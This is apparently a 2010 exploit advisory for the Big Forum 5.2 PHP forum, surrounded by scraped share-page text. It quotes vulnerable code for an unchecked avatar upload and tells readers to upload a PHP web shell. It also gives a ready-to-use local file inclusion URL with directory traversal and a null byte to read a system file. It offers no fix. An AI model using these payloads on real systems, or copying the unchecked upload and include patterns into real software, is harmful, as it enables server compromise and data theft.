扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 |
=> Big Forum 5.2v Arbitrary File Upload & Local File Inclusion Vulnerability => Author : Zer0 Thunder => Home : http://colombohackers.com => Download : http://sourceforge.net/projects/npage-bigforum/files/bigforum%205.2/bf5.2.zip/download => Date : 06/24/2010 Arbitrary File Upload --------------------- Vuln C0de ============================================================================================================= if($_FILES['datei']['size'] <102400) { move_uploaded_file($_FILES['datei']['tmp_name'], "images/avatar/".$_FILES['datei']['name']); echo "Danke, dein Avatar wurde hochgeladen, es wird nun angezeigt."; $pfad = $_FILES['datei']['name']; mysql_query("UPDATE users SET ava_link = 'images/avatar/$pfad' WHERE username LIKE '". USER ."'"); } you will have to register before doing this ============================================================================================================= Vuln Page link : http://localhost/bf/main.php?do=ava (Upload the shell.php or shell.jpg.php ) Local File Inclusion -------------------- ============================================================================================================= if($_GET["aktion"] == "install") { $path = "../includes/plugins/$_GET[datei]"; include($path); plugin_install($kurzc, $_GET["datei"]); echo "Danke, der Mod wurde erfolgreich installiert."; exit; } ============================================================================================================= http://localhost/bf/admin/admin.php?do=mods&aktion=install&datei=../../../../../boot.ini%00 -------------------------------------- Msn : zer0_thunder@colombohackers.com -------------------------------------- |
体验盒子
